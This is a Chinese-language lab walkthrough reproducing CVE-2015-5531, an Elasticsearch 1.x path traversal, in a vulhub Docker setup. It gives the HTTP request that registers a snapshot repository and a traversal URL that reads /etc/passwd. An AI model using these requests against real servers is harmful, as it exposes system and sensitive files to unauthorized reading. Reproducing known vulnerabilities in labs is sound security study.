漏洞类型:路径遍历
漏洞影响版本:1.0.0 – 1.6.0
攻击路径:远程
漏洞产生原因:源于程序没有充分过滤用户提交的输入,远程攻击者可借助目录遍历字符‘…’利用该漏洞访问包含敏感信息的任意文件。
先说说elasticsearch 的备份与快照功能
漏洞利用需要涉及到elasticsearch的备份功能,elasticsearch 提供了一套强大的API,使得elasticsearch备份非常简单
要实现备份功能。前提是elasticsearch 进程对备份目录有写入权限,一般来说我们可以利用/tmp 或者elasticsearch 自身的安装目录,默认情况下这两个目录elasticsearch 进程都是有写入权限的
cd vulhub/elasticsearch/CVE-2015-5531/ docker-compose up -d
1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。
访问http://127.0.0.1:9200/
新建一个厂库
PUT /_snapshot/test HTTP/1.1
Host: 127.0.0.1:9200
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,**;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 126
{
"type": "fs",
"settings": {
"location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
}
}
读取文件/etc/passwd
http://127.0.0.1:9200/_snapshot/test/backdata%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2fetc%2fpasswd
暂时没转为ASCII
